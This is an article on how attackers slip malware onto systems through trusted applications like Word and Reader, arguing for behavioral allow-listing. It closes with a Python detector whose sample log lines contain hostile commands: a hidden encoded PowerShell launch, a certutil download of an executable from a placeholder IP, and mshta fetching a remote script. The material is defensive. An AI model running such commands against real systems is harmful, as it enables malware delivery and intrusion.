Cybercriminals are always improving their craft. Their knowledge of, and ability to bypass, security controls advance constantly, and as they learn they develop impersonation techniques that are increasingly adept at evading detection and reaching sensitive data. This happens while many of their targets fail to upgrade their defenses to detect and block those techniques. Attackers currently have plenty of soft targets and know how to penetrate them. A climate that favors the attacker underscores why organizations, as potential targets, need to rethink their approach to data and system security.
One of the most common approaches is for the attacker to pose as an employee or partner of the organization under attack. This is the path of least resistance for introducing malicious code to a system disguised as, or carried inside, a trusted application. Without up-to-date security controls in place, attackers fly under the radar to reach sensitive information and even extract money. The cost to a breached enterprise can be steep: the loss of assets can be crippling, and so can the damage to reputation. As these attacks become more common, organizations must prepare with a modern, flexible security strategy built from several layers of defense.
How Do Hackers Introduce Malicious Code?
Common, widely used applications such as Microsoft Word and Adobe Reader are trusted, appear secure, and are permitted to run code on an individual's computer. That combination makes them popular and effective entry points for introducing malicious code onto targeted systems.
Attackers exploit vulnerabilities in these applications, or abuse legitimate features such as document macros. Typically, the attacker sends the recipient a specially crafted document or link that looks like ordinary business activity. Once the file is opened or the link clicked, the weakness in the commandeered application lets the payload (ransomware, an advanced persistent threat's implant, spyware, or any other type of malware) execute on the host system with the trusted application's privileges.
Once the code is running on the system, it can be difficult, sometimes impossible, to detect. Remediating malicious code and removing it from an infected system is a painstaking process. It is imperative that enterprises deploy security controls that protect their data centers and their valuable, sensitive information.
Identifying Malicious Code
The typical attacker has practiced the craft for some time and understands how to evade the security controls in use today. For example, traditional signature-based solutions rely on what they have learned from previous attacks to protect networks and systems from inbound threats, so they have little to offer against new and evolving threats whose signatures do not yet exist.
Microsoft's Windows Malicious Software Removal Tool is one example. It scans a computer for known, prevalent malware families and removes what it finds. Its weakness is that it reacts after an infection has occurred rather than preventing it. Once malware has gained a foothold in a data center or network, it is harder to detect and remove, and it has likely already caused damage.
Machine learning solutions, generally regarded as more advanced, also learn from what has happened in the past. They achieve higher detection rates and can often catch variants of known malware, because they generalize from features of previous samples rather than matching exact signatures, but they are still trained on historical attacks and can miss techniques that differ from anything in their training data. Against genuinely new or emerging threats they remain a partial defense.
The Path to Cybersecurity
New threats emerge regularly, and the answer lies in an aggressive, pre-emptive, proactive posture. Organizations that want true data security must begin to think this way.
To do this, organizations must shift their security mindset and implement solutions that map every legitimate execution path of an application, based on the code its vendor, such as Microsoft or Adobe, actually shipped. With that map in hand, any behavior that deviates from the application's own code, such as a word processor spawning a command shell, can be recognized as an inconsistency. Recognized, legitimate actions are confirmed in real time, while unidentified activity is blocked immediately and reviewed.
A proactive approach is a critical mindset change and an imperative if companies want to be in control of their network security. If organizations remain reactive, they will keep consuming valuable resources and risking their reputations as they chase and clean up the mess left behind after an attack has happened.
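The following added example (not code from the article or from any vendor it alludes to) shows the mapping idea above at its simplest: a hypothetical baseline of the child processes Word and Reader launch legitimately, applied to constructed process-creation log lines so that a word processor spawning PowerShell or mshta is blocked while the printing and crash-reporting helpers are allowed. Field names are loosely modelled on Sysmon's process-creation event; the baseline sets, paths and command lines are assumptions built for illustration.

```python
"""Behavioral allow-listing of a trusted application's child processes.

Added example: maps the child processes a document application legitimately
launches and flags any process-creation event that deviates from that map.
The baseline sets and the log lines are constructed for illustration.
"""
import re
from dataclasses import dataclass
from typing import Dict, FrozenSet, List

# Hypothetical baseline (an assumption for this example, not a vendor-supplied
# list): for each trusted parent image, the child images seen during legitimate
# use (print spooler helper, crash reporter, Reader's rendering process).
BASELINE: Dict[str, FrozenSet[str]] = {
    "winword.exe": frozenset({"splwow64.exe", "werfault.exe", "msosync.exe"}),
    "acrord32.exe": frozenset({"acrocef.exe", "rdrcef.exe", "werfault.exe"}),
}

# Constructed process-creation records in a key="value" line format loosely
# modelled on Sysmon event 1 field names.  None of these are real telemetry.
SAMPLE_EVENTS: List[str] = [
    r'ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" '
    r'Image="C:\Windows\splwow64.exe" CommandLine="splwow64.exe 12288"',
    r'ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" '
    r'Image="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
    r'CommandLine="powershell.exe -nop -w hidden -enc QQBCAEMA"',
    r'ParentImage="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" '
    r'Image="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\RdrCEF.exe" '
    r'CommandLine="RdrCEF.exe --type=renderer"',
    r'ParentImage="C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" '
    r'Image="C:\Windows\System32\cmd.exe" '
    r'CommandLine="cmd.exe /c certutil -urlcache -f http://203.0.113.5/a.exe a.exe"',
    r'ParentImage="C:\Windows\explorer.exe" Image="C:\Windows\System32\notepad.exe" '
    r'CommandLine="notepad.exe notes.txt"',
    r'ParentImage="C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" '
    r'Image="C:\Windows\System32\mshta.exe" CommandLine="mshta.exe http://203.0.113.5/x.hta"',
]

# key="value" pairs; values are assumed not to contain embedded double quotes.
FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


@dataclass(frozen=True)
class Verdict:
    parent: str
    child: str
    action: str   # "allow", "block" or "unknown-parent"
    reason: str


def basename(image_path: str) -> str:
    """Normalise an image path to a lower-case file name so that
    'C:\\Windows\\WINWORD.EXE' and 'winword.exe' compare equal."""
    return image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event: str) -> Verdict:
    """Judge one process-creation record against the behavioral baseline."""
    fields = dict(FIELD_RE.findall(event))
    parent = basename(fields.get("ParentImage", ""))
    child = basename(fields.get("Image", ""))
    expected = BASELINE.get(parent)
    if expected is None:
        # Only applications we have mapped get a verdict; everything else is
        # left to other controls rather than guessed at.
        return Verdict(parent, child, "unknown-parent", "no baseline for this parent")
    if child in expected:
        return Verdict(parent, child, "allow", "child is in the mapped legitimate set")
    return Verdict(parent, child, "block",
                   f"{parent} is not expected to launch {child}; "
                   f"command line: {fields.get('CommandLine', '')}")


def triage(events: List[str]) -> List[Verdict]:
    return [evaluate(e) for e in events]


def summarize(verdicts: List[Verdict]) -> Dict[str, int]:
    counts = {"allow": 0, "block": 0, "unknown-parent": 0}
    for v in verdicts:
        counts[v.action] += 1
    return counts


if __name__ == "__main__":
    results = triage(SAMPLE_EVENTS)
    for v in results:
        print(f"{v.action:<15} {v.parent} -> {v.child}: {v.reason}")
    print(summarize(results))
```

The key property is that the decision is made from the application's known-good behavior, not from a signature of the payload, so a never-before-seen dropper launched through the same macro still trips the rule. Real products map far more than process creation (loaded modules, memory permissions, network calls), and the baseline has to be maintained as vendors update their software, or legitimate helper processes will start being blocked.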